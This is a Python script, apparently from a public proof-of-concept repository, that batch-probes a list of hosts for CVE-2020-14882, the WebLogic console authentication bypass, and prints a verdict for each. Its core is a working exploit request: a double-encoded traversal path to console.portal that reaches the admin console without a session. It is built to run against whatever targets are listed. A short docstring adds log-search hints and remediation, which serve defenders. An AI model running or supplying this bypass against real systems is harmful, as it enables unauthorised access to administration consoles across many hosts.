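"""Batch check for CVE-2020-14882 (WebLogic console page served without login).

Repository layout this script comes from:

    ├── target.txt           targets, one per line, in ip:port form (x.x.x.x:xx)
    ├── demo.png             screenshot of a run:
    │                        https://raw.githubusercontent.com/GGyao/CVE-2020-14882_POC/HEAD/demo.png
    ├── README.md            "CVE-2020-14882 batch verification"
    └── CVE-2020-14882.py    this file

Usage (from README.md): put the targets into target.txt, one per line, then run

    python3 CVE-2020-14882.py

Reading the output:

    [+]  the response body contained the console home-page marker, i.e. the
         page rendered for a request that carried no session.
    [-]  the marker was absent. This is not proof of a patched server: only
         plain HTTP is tried, the timeout is 3 seconds, and a proxy or WAF in
         front of the console can change the response.
    [!]  the request itself failed (refused, timed out, malformed target), so
         nothing is known about that host.

For defenders: the request path contains a double-URL-encoded "../"
(%252E%252E%252F) under /console/images/ followed by console.portal, which is
a practical string to search for in web and proxy access logs. Remediation is
the vendor patch for this CVE plus keeping the administration console off
untrusted networks.
"""

import requests

# Certificate verification is switched off in the request below; without this
# call urllib3 would print an InsecureRequestWarning for every HTTPS hop that
# a redirect leads to.
requests.packages.urllib3.disable_warnings()

# Sent unchanged with every probe. NOTE(review): the User-Agent value itself
# starts with the literal text "User-Agent: ", so the header arrives doubled
# on the wire; left as the author wrote it, and it makes this tool's requests
# easy to recognise in access logs.
headers_wls_1213 = {
    'User-Agent': 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0',
    'Content-Type': 'text/xml',
}

# Path and query appended to "http://<target>"; kept exactly as on the page.
_PROBE_PATH = '/console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=java.lang.String("ahihi")'

# Substring looked for in the response body to decide that the console
# home page was returned.
_MARKER = "quicklinksrowout"


def main():
    """Probe every target listed in target.txt and print one verdict per line.

    Reads ``target.txt`` from the current working directory. Each non-empty
    line is used verbatim as ``host:port``. A target whose request fails is
    reported with a ``[!]`` line and the run continues with the next one.

    Raises:
        OSError: if target.txt cannot be opened.
    """
    # The context manager closes the file even if the loop is interrupted.
    with open("target.txt") as targets:
        for line in targets:
            target = line.strip()
            if not target:
                # A blank line would otherwise become "http:///console/...".
                continue

            url = "http://" + target + _PROBE_PATH
            try:
                bypass_1 = requests.get(url, headers=headers_wls_1213, timeout=3, verify=False)
            except (requests.RequestException, ValueError) as e:
                # Report instead of silently dropping the target: an
                # unreachable host must not read as "checked and clean".
                print("[!] " + target + " could not be checked (" + type(e).__name__ + ")")
                continue

            # Heuristic: only the body marker is tested, not the status code.
            if _MARKER in bypass_1.text:
                print("[+] " + target + " is vulnerable!")
            else:
                print("[-] " + target + " is not vulnerable!")


if __name__ == "__main__":
    main()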